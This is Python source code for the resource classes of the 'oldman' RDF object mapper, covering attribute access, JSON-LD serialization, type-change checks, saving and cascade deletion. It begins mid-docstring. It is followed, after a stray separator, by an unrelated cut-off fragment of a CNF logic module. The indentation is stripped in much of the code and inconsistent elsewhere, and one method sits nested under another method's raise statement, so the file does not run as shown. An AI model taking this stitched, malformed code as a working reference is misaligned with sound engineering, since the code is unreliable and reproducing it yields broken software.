or another RDF format (for external consumption).
A resource is usually instance of some RDFS classes. These classes are grouped in its attribute `types`.
:class:`~oldman.model.Model` objects are found from these classes, by calling the method
:func:`oldman.resource.manager.ResourceManager.find_models_and_types`.
Models give access to Python methods and to :class:`~oldman.attribute.OMAttribute` objects.
Their ordering determines inheritance priorities.
The main model is the first one of this list.
Values of :class:`~oldman.attribute.OMAttribute` objects are accessible and modifiable
like ordinary Python attribute values.
However, these values are checked so some :class:`~oldman.exception.OMAccessError`
or :class:`~oldman.exception.OMEditError` errors may be raised.
This abstract class accepts two concrete classes: :class:`~oldman.resource.resource.StoreResource` and
:class:`~oldman.resource.resource.ClientResource`. The former is serializable and can be saved directly
by the datastore while the latter has to be converted into a :class:`~oldman.resource.resource.StoreResource`
so as to be saved.
Example::
>>> alice = StoreResource(model_manager, data_store, types=["http://schema.org/Person"], name=u"Alice")
>>> alice.id
u'http://localhost/persons/1'
>>> alice.name
u'Alice'
>>> alice.save()
>>> alice.name = "Alice A."
>>> print alice.to_jsonld()
{
"@context": "http://localhost/person.jsonld",
"id": "http://localhost/persons/1",
"types": [
"http://schema.org/Person"
],
"name": "Alice A."
}
>>> alice.name = 5
oldman.exception.OMAttributeTypeCheckError: 5 is not a (<type 'str'>, <type 'unicode'>)
.. admonition:: Resource creation
:class:`~oldman.resource.resource.Resource` objects are normally created by a
:class:`~oldman.model.model.Model` or a
:class:`~oldman.resource.manager.ResourceManager` object. Please use the
methods :func:`oldman.model.model.Model.create`, :func:`oldman.model.Model.new`,
:func:`oldman.resource.manager.ResourceManager.create` or
:func:`oldman.resource.manager.ResourceManager.new` for creating new
:class:`~oldman.resource.Resource` objects.
:param model_manager: :class:`~oldman.model.manager.ModelManager` object. Gives access to its models.
:param data_store: :class:`~oldman.store.datastore.DataStore` object. Datastore that has authority
on this resource.
:param id: IRI of the resource. If not given, this IRI is generated by the main model. Defaults to `None`.
:param types: IRI list or set of the RDFS classes the resource is instance of. Defaults to `set()`.
:param hashless_iri: Hash-less IRI that is given to the main model for generating a new IRI if no `id` is given.
The IRI generator may ignore it. Defaults to `None`. Must be `None` if `collection_iri` is given.
:param collection_iri: IRI of the controller to which this resource belongs. This information
is used to generate a new IRI if no `id` is given. The IRI generator may ignore it.
Defaults to `None`. Must be `None` if `hashless_iri` is given.
:param is_new: When is `True` and `id` given, checks that the IRI is not already existing in the
`data_store`. Defaults to `True`.
:param former_types: IRI list or set of the RDFS classes the resource was instance of. Defaults to `set()`.
:param kwargs: values indexed by their attribute names.
"""
# Attribute names handled directly by __setattr__/__init__: stored in the
# instance __dict__, bypassing the OMAttribute machinery.
_special_attribute_names = ["_models", "_id", "_types", "_is_blank_node", "_model_manager",
                            "_store", "_former_types", "_logger", "_resource_manager", "_is_new"]
# Attributes kept when pickling; the rest is rebuilt by
# _init_non_persistent_attributes (presumably used by StoreResource — confirm).
_pickle_attribute_names = ["_id", '_types', '_is_new']
def __init__(self, model_manager, data_store, id=None, types=None, hashless_iri=None, collection_iri=None,
             is_new=True, former_types=None, **kwargs):
    """Inits but does not save it (in the `data_graph`).

    See the class docstring for the parameter descriptions. Extra keyword
    arguments are assigned through ``setattr`` and therefore go through the
    OMAttribute machinery.
    """
    # Model ordering determines attribute/method lookup priority.
    self._models, self._types = model_manager.find_models_and_types(types)
    if former_types is not None:
        self._former_types = set(former_types)
    else:
        # An already-persisted resource starts with its current types as
        # its former types; a brand new one has none.
        self._former_types = set(self._types) if not is_new else set()
    main_model = self._models[0]
    self._model_manager = model_manager
    self._store = data_store
    self._is_new = is_new
    if hashless_iri is not None and collection_iri is not None:
        raise OMUserError(u"Hashless_iri (%s) and collection_iri (%s) cannot be given in the same time."
                          % (hashless_iri, collection_iri))
    if id is not None:
        # Anticipated because used in __hash__
        self._id = id
        # Only a *new* resource must not clash with an existing IRI.
        if is_new and self._store.exists(id):
            raise OMUniquenessError("Object %s already exist" % self._id)
    else:
        # No IRI given: let the main model's IRI generator mint one.
        self._id = main_model.generate_iri(hashless_iri=hashless_iri,
                                           collection_iri=collection_iri)
    self._init_non_persistent_attributes(self._id)
    for k, v in kwargs.iteritems():  # NOTE: Python 2 dict API
        if k in self._special_attribute_names:
            raise AttributeError(u"Special attribute %s should not appear in **kwargs" % k)
        setattr(self, k, v)
def _init_non_persistent_attributes(self, id):
    """Rebuild the attributes that are not pickled.

    Called both at init time and after unpickling.
    """
    self._is_blank_node = is_blank_node(id)
    self._logger = logging.getLogger(__name__)
@property
def types(self):
"""IRI list of the RDFS classes the resource is instance of."""
return list(self._types)
@property
def models(self):
"""TODO: describe"""
return list(self._models)
@property
def id(self):
"""IRI that identifies the resource."""
return self._id
@property
def hashless_iri(self):
"""Hash-less IRI of the `id` attribute.
Is obtained by removing the fragment from the IRI.
"""
return self._id.split('#')[0]
@property
def context(self):
""" An IRI, a `list` or a `dict` that describes the JSON-LD context.
Derived from :attr:`oldman.model.Model.context` attributes.
"""
if len(self._models) > 1:
raise NotImplementedError(u"TODO: merge contexts when a Resource has multiple models")
return list(self._models)[0].context
@property
def local_context(self):
"""Context that is locally accessible but that may not be advertised in the JSON-LD serialization."""
if len(self._models) > 1:
raise NotImplementedError(u"TODO: merge local contexts when a Resource has multiple models")
return list(self._models)[0].local_context
@property
def model_manager(self):
""":class:`~oldman.model.manager.ModelManager` object. Gives access to the
:class:`~oldman.model.model.Model` objects. """
return self._model_manager
@property
def store(self):
""":class:`~oldman.store.datastore.DataStore` object."""
return self._store
@property
def is_new(self):
"""True if the resource has never been saved."""
return self._is_new
@property
def former_types(self):
"""Not for end-users"""
return list(self._former_types)
@property
def non_model_types(self):
"""RDFS classes that are not associated to a `Model`."""
return set(self._types).difference({m.class_iri for m in self._models})
@property
def former_non_model_types(self):
"""RDFS classes that were not associated to a `Model`."""
if len(self._former_types) == 0:
return {}
possible_non_model_types = set(self._former_types).difference({m.class_iri
for m in self._models})
if len(possible_non_model_types) == 0:
return {}
corresponding_models, _ = self._model_manager.find_models_and_types(possible_non_model_types)
return possible_non_model_types.difference({m.class_iri for m in corresponding_models})
def is_valid(self):
"""Tests if the resource is valid.
:return: `False` if the resource is invalid, `True` otherwise.
"""
for model in self._models:
for attr in model.om_attributes.values():
if not attr.is_valid(self):
return False
return True
def is_blank_node(self):
"""Tests if `id` is a skolem IRI and should thus be considered as a blank node.
See :func:`~oldman.resource.is_blank_node` for further details.
:return: `True` if `id` is a locally skolemized IRI.
"""
return self._is_blank_node
def is_instance_of(self, model):
""" Tests if the resource is instance of the RDFS class of the model.
:param model: :class:`~oldman.model.Model` object.
:return: `True` if the resource is instance of the RDFS class.
"""
return model.class_iri in self._types
def in_same_document(self, other_resource):
"""Tests if two resources have the same hash-less IRI.
:return: `True` if these resources are in the same document.
"""
return self.hashless_iri == other_resource.hashless_iri
def get_operation(self, http_method):
"""TODO: describe """
for model in self._models:
operation = model.get_operation(http_method)
if operation is not None:
return operation
return None
def get_lightly(self, attribute_name):
"""If the attribute corresponds to an `owl:ObjectProperty`, returns a IRI or None.
Otherwise (if is a datatype), returns the value.
"""
return self.get_attribute(attribute_name).get_lightly(self)
def get_attribute(self, attribute_name):
"""Not for the end-user!"""
for model in self._models:
if attribute_name in model.om_attributes:
return model.access_attribute(attribute_name)
raise AttributeError("%s has no regular attribute %s" % (self, attribute_name))
def __getattr__(self, name):
    """Gets:

      * A declared Python method ;
      * A declared operation ;
      * Or the value of a given :class:`~oldman.attribute.OMAttribute` object.

    Note that attributes stored in the `__dict__` attribute are not concerned
    by this method.
    :class:`~oldman.attribute.OMAttribute` objects are made accessible
    by :class:`~oldman.model.Model` objects.

    The first method or :class:`~oldman.attribute.OMAttribute` object matching the requested
    `name` is returned. This is why the ordering of models is so important.

    :param name: attribute name.
    :return: Its value.
    :raise AttributeError: when no model declares an attribute, method or
        operation of that name.
    """
    # Per model (in priority order): OMAttribute value first, then a
    # declared Python method, then a named operation.
    for model in self._models:
        if name in model.om_attributes:
            return model.access_attribute(name).get(self)
        method = model.methods.get(name)
        if method is not None:
            # Make this function be a method (taking self as first parameter)
            return partial(method, self)
        operation = model.get_operation_by_name(name)
        if operation is not None:
            return partial(operation, self)
    raise AttributeError("%s has no attribute %s" % (self, name))
def __setattr__(self, name, value):
"""Sets the value of one or multiple :class:`~oldman.attribute.OMAttribute` objects.
If multiple :class:`~oldman.attribute.OMAttribute` objects have the same
name, they will all receive the same value.
:param name: attribute name.
:param value: value to assign.
"""
if name in self._special_attribute_names:
self.__dict__[name] = value
return
found = False
for model in self._models:
if name in model.om_attributes:
model.access_attribute(name).set(self, value)
found = True
if not found:
raise AttributeError("%s has not attribute %s" % (self, name))
def add_type(self, additional_type):
"""Declares that the resource is instance of another RDFS class.
Note that it may introduce a new model to the list
and change its ordering.
:param additional_type: IRI or JSON-LD term identifying a RDFS class.
"""
if additional_type not in self._types:
new_types = set(self._types)
new_types.add(additional_type)
self._change_types(new_types)
def check_validity(self):
"""Checks its validity.
Raises an :class:`oldman.exception.OMEditError` exception if invalid.
"""
for model in self._models:
for attr in model.om_attributes.values():
attr.check_validity(self)
def receive_id(self, id):
"""Receives the permanent ID assigned by the store.
Useful when the permanent ID is given by an external server.
Replaces the temporary ID of the resource.
"""
# TODO: make sure the previous id was a temporary one
self._id = id
self._is_new = False
def save(self, is_end_user=True):
    """Saves it into the `data_store` and its `resource_cache`.

    Raises an :class:`oldman.exception.OMEditError` exception if invalid.

    :param is_end_user: `False` when an authorized user (not a regular end-user)
       wants to force some rights. Defaults to `True`.
       See :func:`~oldman.attribute.OMAttribute.check_validity` for further details.
    :return: The :class:`~oldman.resource.resource.Resource` object itself.
    :raise NotImplementedError: abstract here; provided by sub-classes.
    """
    raise NotImplementedError("Have to be implemented by sub-classes")
def delete(self):
    """Removes the resource from the `data_store` and its `resource_cache`.

    Cascade deletion is done for related resources satisfying the test
    :func:`~oldman.resource.resource.should_delete_resource`.

    :raise NotImplementedError: abstract here; provided by sub-classes.
    """
    raise NotImplementedError("Have to be implemented by sub-classes")
def _extract_attribute_list(self):
""":return: An ordered list of list of :class:`~oldman.attribute.OMAttribute` objects."""
attributes = []
for model in self._models:
attributes += model.om_attributes.values()
return attributes
def to_dict(self, remove_none_values=True, include_different_contexts=False,
            ignored_iris=None):
    """Serializes the resource into a JSON-like `dict`.

    :param remove_none_values: If `True`, `None` values are not inserted into the dict.
       Defaults to `True`.
    :param include_different_contexts: If `True` local contexts are given to sub-resources.
       Defaults to `False`.
    :param ignored_iris: List of IRI of resources that should not be included in the `dict`.
       Defaults to `set()`. NOTE: when supplied by the caller, this set is
       mutated (this resource's IRI is added to it).
    :return: A `dict` describing the resource.
    """
    if ignored_iris is None:
        ignored_iris = set()
    # Cycle guard: prevents nested _convert_value calls from serializing
    # this resource again.
    ignored_iris.add(self._id)
    dct = {attr.name: self._convert_value(getattr(self, attr.name), ignored_iris, remove_none_values,
                                          include_different_contexts)
           for attr in self._extract_attribute_list()
           if not attr.is_write_only}
    # filter None values
    if remove_none_values:
        dct = {k: v for k, v in dct.iteritems() if v is not None}  # NOTE: Python 2 dict API
    # Blank nodes are serialized without an explicit "id".
    if not self.is_blank_node():
        dct["id"] = self._id
    if self._types and len(self._types) > 0:
        dct["types"] = list(self._types)
    return dct
def to_json(self, remove_none_values=True, ignored_iris=None):
"""Serializes the resource into pure JSON (not JSON-LD).
:param remove_none_values: If `True`, `None` values are not inserted into the dict.
Defaults to `True`.
:param ignored_iris: List of IRI of resources that should not be included in the `dict`.
Defaults to `set()`.
:return: A JSON-encoded string.
"""
return json.dumps(self.to_dict(remove_none_values=remove_none_values,
include_different_contexts=False,
ignored_iris=ignored_iris), sort_keys=True, indent=2)
def to_jsonld(self, remove_none_values=True, include_different_contexts=False,
ignored_iris=None):
"""Serializes the resource into JSON-LD.
:param remove_none_values: If `True`, `None` values are not inserted into the dict.
Defaults to `True`.
:param include_different_contexts: If `True` local contexts are given to sub-resources.
Defaults to `False`.
:param ignored_iris: List of IRI of resources that should not be included in the `dict`.
Defaults to `set()`.
:return: A JSON-LD encoded string.
"""
dct = self.to_dict(remove_none_values=remove_none_values,
include_different_contexts=include_different_contexts,
ignored_iris=ignored_iris)
dct['@context'] = self.context
return json.dumps(dct, sort_keys=True, indent=2)
def to_rdf(self, rdf_format="turtle"):
    """Serializes the resource into RDF.

    :param rdf_format: content-type or keyword supported by RDFlib.
       Defaults to `"turtle"`.
    :return: A string in the chosen RDF format.
    """
    g = Graph()
    # Round-trips through the JSON serialization; the local (possibly
    # non-advertised) context drives the JSON-LD parsing.
    g.parse(data=self.to_json(), context=self.local_context, format="json-ld")
    return g.serialize(format=rdf_format)
def __str__(self):
    # The IRI is the natural human-readable identifier.
    return self._id
def __repr__(self):
    # e.g. StoreResource(<http://localhost/persons/1>)
    return u"%s(<%s>)" % (self.__class__.__name__, self._id)
def _convert_value(self, value, ignored_iris, remove_none_values, include_different_contexts=False):
"""Recursive method. Internals of :func:`~oldman.resource.Resource.to_dict`.
:return: JSON-compatible value or list of JSON-compatible values.
"""
# Containers
if isinstance(value, (list, set, GeneratorType)):
return [self._convert_value(v, ignored_iris, remove_none_values, include_different_contexts)
for v in value]
# Object
if isinstance(value, Resource):
# If non-blank or in the same document
if value.id not in ignored_iris and \
(value.is_blank_node() or self.in_same_document(value)):
value_dict = dict(value.to_dict(remove_none_values, include_different_contexts, ignored_iris))
# TODO: should we improve this test?
if include_different_contexts and value._context != self._context:
value_dict["@context"] = value._context
return value_dict
else:
# URI
return value.id
# Literal
return value
def update(self, full_dict, is_end_user=True, allow_new_type=False, allow_type_removal=False, save=True):
    """Updates the resource from a flat `dict`.

    By flat, we mean that sub-resources are only represented by their IRIs:
    there is no nested sub-object structure.

    This dict is supposed to be exhaustive, so absent value is removed.
    Some sub-resources may thus be deleted like if there were a cascade
    deletion.

    :param full_dict: Flat `dict` containing the attribute values to update.
    :param is_end_user: `False` when an authorized user (not a regular end-user)
       wants to force some rights. Defaults to `True`.
       See :func:`~oldman.attribute.OMAttribute.check_validity` for further details.
    :param allow_new_type: If `True`, new types can be added.
       Please keep in mind that type change can:

         - Modify the behavior of the resource by changing its model list.
         - Interfere with the SPARQL requests using instance tests.

       If enabled, this may represent a major **security concern**.
       Defaults to `False`.
    :param allow_type_removal: If `True`, new types can be removed. Same security concerns than above.
       Defaults to `False`.
    :param save: If `True` calls :func:`~oldman.resource.Resource.save` after updating. Defaults to `True`.

    :return: The :class:`~oldman.resource.Resource` object itself.
    """
    #if not self.is_blank_node() and "id" not in full_dict:
    if "id" not in full_dict:
        raise OMWrongResourceError(u"Cannot update an object without IRI")
    elif full_dict["id"] != self._id:
        raise OMWrongResourceError(u"Wrong IRI %s (%s was expected)" % (full_dict["id"], self._id))
    attributes = self._extract_attribute_list()
    attr_names = [a.name for a in attributes]
    # Reject keys that match neither an attribute nor a reserved key.
    for key in full_dict:
        if key not in attr_names and key not in ["@context", "id", "types"]:
            raise OMAttributeAccessError(u"%s is not an attribute of %s" % (key, self._id))
    # Type change resource
    if "types" in full_dict:
        try:
            new_types = set(full_dict["types"])
        except TypeError:
            # Bug fix: `new_types` was referenced here before being assigned,
            # which raised a NameError that masked the real problem. Report
            # the offending raw value instead.
            raise OMEditError(u"'types' attribute is not a list, a set or a string but is %s "
                              % full_dict["types"])
        self._check_and_update_types(new_types, allow_new_type, allow_type_removal)
    for attr in attributes:
        value = full_dict.get(attr.name)
        # set is not a JSON structure (but a JSON-LD one)
        if value is not None and attr.container == "@set":
            value = set(value)
        attr.set(self, value)
    if save:
        self.save(is_end_user)
    return self
def update_from_graph(self, subgraph, initial=False, is_end_user=True, allow_new_type=False,
                      allow_type_removal=False, save=True):
    """Similar to :func:`~oldman.resource.Resource.full_update` but with
    a RDF graph instead of a Python `dict`.

    :param subgraph: :class:`rdflib.Graph` object containing the full description of the resource.
    :param initial: `True` when the subgraph comes from the `data_graph` and is thus used
       to load :class:`~oldman.resource.Resource` object from the triple store.
       Defaults to `False`.
    :param is_end_user: `False` when an authorized user (not a regular end-user)
       wants to force some rights. Defaults to `True`.
       See :func:`~oldman.attribute.OMAttribute.check_validity` for further details.
    :param allow_new_type: If `True`, new types can be added. Defaults to `False`. See
       :func:`~oldman.resource.Resource.full_update` for explanations about the
       security concerns.
    :param allow_type_removal: If `True`, new types can be removed. Same security concerns than above.
       Defaults to `False`.
    :param save: If `True` calls :func:`~oldman.resource.Resource.save` after updating. Defaults to `True`.

    :return: The :class:`~oldman.resource.Resource` object itself.
    """
    for attr in self._extract_attribute_list():
        attr.update_from_graph(self, subgraph, initial=initial)
    #Types
    # On initial load the types are trusted as-is; otherwise the change
    # must pass the permission checks.
    if not initial:
        # NOTE: `unicode` is Python-2-only.
        new_types = {unicode(t) for t in subgraph.objects(URIRef(self._id), RDF.type)}
        self._check_and_update_types(new_types, allow_new_type, allow_type_removal)
    if save:
        self.save(is_end_user)
    return self
def get_related_resource(self, id):
    """ Not for end-users!

    Must be implemented by concrete classes.
    If cannot get the resource, return its IRI.

    :param id: IRI of the related resource to retrieve.
    :raise NotImplementedError: abstract here.
    """
    raise NotImplementedError("To be implemented by a concrete sub-class")
    def _check_and_update_types(self, new_types, allow_new_type, allow_type_removal):
        """Validates a new set of type IRIs and, if it differs, updates the models.

        :param new_types: set of type IRIs the resource should now have.
        :param allow_new_type: if `False`, raises when `new_types` adds a type.
        :param allow_type_removal: if `False`, raises when an explicitly declared
                                   type would be removed.
        :raises OMUnauthorizedTypeChangeError: on a disallowed addition or removal.
        """
        current_types = set(self._types)
        # Nothing to validate when the type set is unchanged
        if new_types == current_types:
            return
        change = False
        # Appending new types
        additional_types = new_types.difference(current_types)
        if len(additional_types) > 0:
            if not allow_new_type:
                raise OMUnauthorizedTypeChangeError(u"Adding %s to %s has not been allowed"
                                                    % (additional_types, self._id))
            change = True
        # Removal
        missing_types = current_types.difference(new_types)
        if len(missing_types) > 0:
            # Implicit types: ancestry types brought in by the models, minus the
            # models' own classes. Dropping them is not an explicit removal.
            implicit_types = {t for m in self._models for t in m.ancestry_iris}.difference(
                {m.class_iri for m in self._models})
            removed_types = missing_types.difference(implicit_types)
            if len(removed_types) > 0:
                if not allow_type_removal:
                    raise OMUnauthorizedTypeChangeError(u"Removing %s to %s has not been allowed"
                                                        % (removed_types, self._id))
                change = True
        if change:
            # Re-derive the models (and the resulting type list) from the new types
            self._models, types = self._model_manager.find_models_and_types(new_types)
            self._change_types(types)
    def _change_types(self, new_types):
        """Replaces the resource's types with `new_types`.

        No validation is done here: callers validate beforehand through
        :func:`_check_and_update_types`.
        """
        self._types = new_types
    def _get_om_attribute(self, name):
        """Looks up the OMAttribute `name` among the resource's models.

        Models are scanned in order; the first model declaring the attribute wins.

        :param name: short name of the attribute.
        :return: the matching OMAttribute object.
        :raises AttributeError: if no model declares `name`.
        """
        for model in self._models:
            if name in model.om_attributes:
                return model.access_attribute(name)
        # Debugging aid before failing: shows which models/types were searched
        self._logger.debug(u"Models: %s, types: %s" % ([m.name for m in self._models], self._types))
        #self._logger.debug(u"%s" % self._manager._registry.model_names)
        raise AttributeError(u"%s has not attribute %s" % (self, name))
    def _filter_objects_to_delete(self, ids):
        """Selects, among `ids`, the related resources to delete in cascade.

        Abstract hook implemented by each concrete sub-class.
        """
        raise NotImplementedError("Implemented by a sub-class")
class StoreResource(Resource):
    """StoreResource: resource manipulated by the data store.

    End-users should not manipulate it.
    Is serializable (pickable).
    """

    @classmethod
    def load_from_graph(cls, model_manager, data_store, id, subgraph, is_new=True, collection_iri=None):
        """Loads a new :class:`~oldman.resource.StoreResource` object from a sub-graph.

        TODO: update the comments.

        :param model_manager: model manager in charge of the resource.
        :param data_store: store the resource is persisted in.
        :param id: IRI of the resource.
        :param subgraph: :class:`rdflib.Graph` object containing triples about the resource.
        :param is_new: When is `True` and `id` given, checks that the IRI is not already existing in the
                       `union_graph`. Defaults to `True`.
        :param collection_iri: IRI of the collection the resource belongs to. Defaults to `None`.
        :return: The :class:`~oldman.resource.Resource` object created.
        """
        # The declared types are read from the graph itself
        types = list({unicode(t) for t in subgraph.objects(URIRef(id), RDF.type)})
        instance = cls(model_manager, data_store, id=id, types=types, is_new=is_new, collection_iri=collection_iri)
        instance.update_from_graph(subgraph, is_end_user=True, save=False, initial=True)
        return instance

    def __getstate__(self):
        """Pickles this resource into a plain `dict`."""
        state = {name: getattr(self, name) for name in self._pickle_attribute_names}
        state["store_name"] = self._store.name
        # Reversed order so that important models can overwrite values.
        # BUG FIX: iterate over a reversed view instead of calling
        # self._models.reverse(), which mutated the model list in place
        # every time the resource was pickled.
        for model in reversed(self._models):
            for name, attr in model.om_attributes.iteritems():
                value = attr.get_lightly(self)
                if isinstance(value, GeneratorType):
                    # Generators are not picklable: materialize them
                    if attr.container == "@list":
                        value = list(value)
                    else:
                        value = set(value)
                if value is not None:
                    state[name] = value
        return state

    def __setstate__(self, state):
        """Unpickles this resource from its serialized `state`."""
        required_fields = self._pickle_attribute_names + ["store_name"]
        for name in required_fields:
            if name not in state:
                #TODO: find a better exception (due to the cache)
                raise OMInternalError(u"Required field %s is missing in the cached state" % name)
        self._id = state["_id"]
        self._is_new = state["_is_new"]
        self._init_non_persistent_attributes(self._id)
        # Store
        from oldman.store.datastore import DataStore
        self._store = DataStore.get_store(state["store_name"])
        self._model_manager = self._store.model_manager
        # Models and types
        self._models, self._types = self._model_manager.find_models_and_types(state["_types"])
        self._former_types = set(self._types)
        # Attributes (Python attributes or OMAttributes)
        for name, value in state.iteritems():
            if name in ["store_name", "_id", "_types", "_is_new"]:
                continue
            elif name in self._special_attribute_names:
                setattr(self, name, value)
            # OMAttributes
            else:
                attribute = self._get_om_attribute(name)
                attribute.set(self, value)
                # Clears former values (allows modification)
                attribute.receive_storage_ack(self)

    def get_related_resource(self, id):
        """Gets a related `StoreResource` by calling the datastore directly.

        Returns the IRI itself when the resource cannot be found.
        """
        resource = self.store.get(id=id)
        if resource is None:
            return id
        return resource

    def save(self, is_end_user=True):
        """Saves it into the `data_store` and its `resource_cache`.

        Raises an :class:`oldman.exception.OMEditError` exception if invalid.

        :param is_end_user: `False` when an authorized user (not a regular end-user)
                            wants to force some rights. Defaults to `True`.
                            See :func:`~oldman.attribute.OMAttribute.check_validity` for further details.
        :return: The :class:`~oldman.resource.resource.Resource` object itself."""
        # Checks
        attributes = self._extract_attribute_list()
        for attr in attributes:
            attr.check_validity(self, is_end_user)
        # Find objects to delete
        objects_to_delete = []
        for attr in attributes:
            if not attr.has_changed(self):
                continue
            # Some former objects may be deleted
            if attr.om_property.type == OBJECT_PROPERTY:
                former_value, value = attr.diff(self)
                if isinstance(former_value, dict):
                    raise NotImplementedError("Object dicts are not yet supported.")
                former_value = former_value if isinstance(former_value, (set, list)) else [former_value]
                # Cache invalidation (because of possible reverse properties)
                resources_to_invalidate = set(value) if isinstance(value, (set, list)) else {value}
                resources_to_invalidate.update(former_value)
                for r in resources_to_invalidate:
                    if r is not None:
                        self._store.resource_cache.remove_resource_from_id(r)
                objects_to_delete += self._filter_objects_to_delete(former_value)
        # Update literal values
        self.store.save(self, attributes, self._former_types)
        # Delete the objects
        for obj in objects_to_delete:
            obj.delete()
        # Clears former values.
        # BUG FIX: snapshot with set() instead of aliasing self._types,
        # consistently with __setstate__, so later type changes cannot
        # corrupt the recorded baseline.
        self._former_types = set(self._types)
        for attr in attributes:
            attr.receive_storage_ack(self)
        return self

    def delete(self):
        """Removes the resource from the `data_store` and its `resource_cache`.

        Cascade deletion is done for related resources satisfying the test
        :func:`~oldman.resource.resource.should_delete_resource`.
        """
        attributes = self._extract_attribute_list()
        for attr in attributes:
            # Delete blank nodes recursively
            if attr.om_property.type == OBJECT_PROPERTY:
                value = getattr(self, attr.name)
                if value is not None:
                    objs = value if isinstance(value, (list, set, GeneratorType)) else [value]
                    for obj in objs:
                        if should_delete_resource(obj):
                            self._logger.debug(u"%s deleted with %s" % (obj.id, self._id))
                            obj.delete()
                        else:
                            self._logger.debug(u"%s not deleted with %s" % (obj.id, self._id))
                            # Cache invalidation (because of possible reverse properties)
                            self._store.resource_cache.remove_resource(obj)
            setattr(self, attr.name, None)
        #Types
        self._change_types(set())
        self._store.delete(self, attributes, self._former_types)
        # Clears former values
        for attr in attributes:
            attr.receive_storage_ack(self)
        self._is_new = False

    def _filter_objects_to_delete(self, ids):
        """Keeps only the locally-skolemized blank nodes among `ids`."""
        return [self.store.get(id=id) for id in ids
                if id is not None and is_blank_node(id)]
class ClientResource(Resource):
    """ClientResource: resource manipulated by the end-user.

    Has access to the `resource_manager`.
    Is not serializable.
    """

    def __init__(self, resource_manager, model_manager, store, **kwargs):
        Resource.__init__(self, model_manager, store, **kwargs)
        self._resource_manager = resource_manager

    @classmethod
    def load_from_graph(cls, resource_manager, model_manager, data_store, id, subgraph, is_new=True,
                        collection_iri=None):
        """Loads a new :class:`~oldman.resource.ClientResource` object from a sub-graph.

        TODO: update the comments.

        :param resource_manager: :class:`~oldman.resource.manager.ResourceManager` object.
        :param model_manager: model manager in charge of the resource.
        :param data_store: store the resource is persisted in.
        :param id: IRI of the resource.
        :param subgraph: :class:`rdflib.Graph` object containing triples about the resource.
        :param is_new: When is `True` and `id` given, checks that the IRI is not already existing in the
                       `union_graph`. Defaults to `True`.
        :param collection_iri: IRI of the collection the resource belongs to. Defaults to `None`.
        :return: The :class:`~oldman.resource.Resource` object created.
        """
        types = list({unicode(t) for t in subgraph.objects(URIRef(id), RDF.type)})
        instance = cls(resource_manager, model_manager, data_store, id=id, types=types, is_new=is_new,
                       collection_iri=collection_iri)
        instance.update_from_graph(subgraph, is_end_user=True, save=False, initial=True)
        return instance

    def get_related_resource(self, id):
        """Gets a related `ClientResource` through the resource manager.

        Returns the IRI itself when the resource cannot be retrieved.
        """
        resource = self._resource_manager.get(id=id)
        if resource is None:
            return id
        return resource

    def save(self, is_end_user=True):
        """Saves it into the `data_store` and its `resource_cache`.

        Raises an :class:`oldman.exception.OMEditError` exception if invalid.

        :param is_end_user: `False` when an authorized user (not a regular end-user)
                            wants to force some rights. Defaults to `True`.
                            See :func:`~oldman.attribute.OMAttribute.check_validity` for further details.
        :return: The :class:`~oldman.resource.resource.Resource` object itself."""
        # Validity checks before delegating the persistence
        attributes = self._extract_attribute_list()
        for attr in attributes:
            attr.check_validity(self, is_end_user)
        # The actual saving is delegated to the corresponding store resource
        store_resource = self.model_manager.convert_client_resource(self)
        store_resource.save(is_end_user)
        # Clears former values.
        # BUG FIX: snapshot with set() instead of aliasing self._types, so a
        # later type change cannot corrupt the recorded baseline.
        self._former_types = set(self._types)
        for attr in attributes:
            attr.receive_storage_ack(self)
        self._is_new = False
        # The ID may be updated (if was a temporary IRI before)
        self._id = store_resource.id
        return self

    def delete(self):
        """Removes the resource from the `data_store` and its `resource_cache`.

        Cascade deletion is done for related resources satisfying the test
        :func:`~oldman.resource.resource.should_delete_resource`.
        """
        store_resource = self.model_manager.convert_client_resource(self)
        store_resource.delete()
        # Clears former values (defensive copy, like in save())
        self._former_types = set(self._types)
        # Clears values
        for attr in self._extract_attribute_list():
            setattr(self, attr.name, None)
            attr.receive_storage_ack(self)
        self._is_new = False

    def __getstate__(self):
        """Cannot be pickled."""
        #TODO: find the appropriate exception
        raise Exception("A ClientResource is not serializable.")

    def __setstate__(self, state):
        """Cannot be pickled."""
        #TODO: find the appropriate exception
        raise Exception("A ClientResource is not serializable.")

    def _filter_objects_to_delete(self, ids):
        """TODO: consider other cases than blank nodes """
        # Only locally-skolemized blank nodes are cascade-deletion candidates
        return [self._resource_manager.get(id=id) for id in ids
                if id is not None and is_blank_node(id)]
def is_blank_node(iri):
    """Tells whether `iri` is a locally skolemized blank-node IRI.

    External skolemized blank nodes are not considered as blank nodes.

    :param iri: IRI of the resource.
    :return: `True` if is a blank node.
    """
    parsed = urlparse(iri)
    hosted_locally = parsed.hostname == u"localhost"
    return hosted_locally and (u"/.well-known/genid/" in parsed.path)
def should_delete_resource(resource):
    """Tests if a resource should be deleted (cascade deletion).

    :param resource: :class:`~oldman.resource.Resource` object to evaluate (may be `None`).
    :return: `True` if it should be deleted.
    """
    #TODO: make sure these blank nodes are not referenced somewhere else
    if resource is None:
        return False
    return resource.is_blank_node()
|
|
# Forward declaration: rebound to the concrete CNF implementation (Cnf)
# at the bottom of the module; Variable's boolean operators use it.
cnfClass = None
class Variable(object):
    """A propositional literal: a named variable, possibly negated.

    Boolean operators build CNF formulas through the module-level
    `cnfClass` (bound at the bottom of the module).
    """

    def __init__(self, name, inverted=False):
        self.name = name
        self.inverted = inverted

    def __neg__(self):
        # Fresh literal with the opposite polarity; the original is untouched.
        flipped = Variable(self.name)
        flipped.inverted = not self.inverted
        return flipped

    def __and__(self, other):
        return cnfClass.create_from(self) & other

    def __or__(self, other):
        return cnfClass.create_from(self) | other

    def __xor__(self, other):
        return cnfClass.create_from(self) ^ other

    def __rshift__(self, other):  # implies
        return -cnfClass.create_from(self) | other

    def __str__(self):
        prefix = "-" if self.inverted else ""
        return prefix + str(self.name)

    def __eq__(self, other):
        return (self.name, self.inverted) == (other.name, other.inverted)

    def __hash__(self):
        return hash(self.name) ^ hash(self.inverted)

    def __cmp__(self, other):
        # Python 2 ordering hook: -1 / 0 / +1 by (name, inverted).
        if self == other:
            return 0
        return -1 if (self.name, self.inverted) < (other.name, other.inverted) else 1
class NaiveCnf(object):
    """Conjunctive-normal-form formula without any simplification.

    `dis` is a list of clauses; each clause is a `frozenset` of literals
    (disjunction), and the clauses are conjoined.
    """

    def __init__(self):
        self.dis = []

    @classmethod
    def create_from(cls, x):
        """Wraps a Variable as a one-clause CNF; passes a NaiveCnf through."""
        if isinstance(x, Variable):
            cnf = NaiveCnf()
            cnf.dis = [frozenset([x])]
            return cnf
